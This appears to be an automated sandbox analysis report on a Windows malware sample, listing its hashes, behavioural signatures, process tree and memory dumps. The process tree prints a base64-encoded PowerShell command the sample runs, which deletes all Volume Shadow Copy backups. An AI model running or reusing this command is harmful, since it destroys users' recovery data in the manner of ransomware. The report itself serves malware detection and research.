Analysis
Max time kernel: 170s
Max time network: 134s
Platform: windows10_x64
Resource: win10-en-20211208
Submitted: 24-01-2022 01:50
Static task: static1
Behavioral task: behavioral1
  Sample: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
  Resource: win10-en-20211208
General
Target: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
Size: 171KB
MD5: 999660513492abf77dcd46db5ae97f17
SHA1: 2c75960079eb449183dc284ca64845f663ab5a61
SHA256: 7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678
SHA512: d988bde1189122a268dbbad2b61459b1238884d79a22cf7a4e52dfb4cd3f87ca3e1e31d30b71a58a99d54446d5ae3f7d117f4eae4fbf715a761da61845666f46
Malware Config
Signatures
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Drops file in Windows directory (64 IoCs)
Processes:
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (pid, process):
  3320  7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
  3320  7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
  408   powershell.exe
  408   powershell.exe
  408   powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes (description, pid, process):
  Token: SeDebugPrivilege    408   powershell.exe
  Token: SeBackupPrivilege   3580  vssvc.exe
  Token: SeRestorePrivilege  3580  vssvc.exe
  Token: SeAuditPrivilege    3580  vssvc.exe
Suspicious use of WriteProcessMemory (2 IoCs)
Processes (description, pid, process, target process):
  PID 3320 wrote to memory of 408  3320  7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe  powershell.exe
  PID 3320 wrote to memory of 408  3320  7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe  powershell.exe
Processes
(depth 1) C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7211a9816d88228a88e64919bc822e2ea84260592fefc616a5691f4a6e347678.exe"
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  (depth 2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
(depth 1) C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
(depth 1) C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/408-120-0x000001903F4B0000-0x000001903F4D2000-memory.dmp  Filesize: 136KB
memory/408-125-0x0000019041660000-0x00000190416D6000-memory.dmp  Filesize: 472KB
memory/408-126-0x000001903F500000-0x000001903F502000-memory.dmp  Filesize: 8KB
memory/408-128-0x000001903F503000-0x000001903F505000-memory.dmp  Filesize: 8KB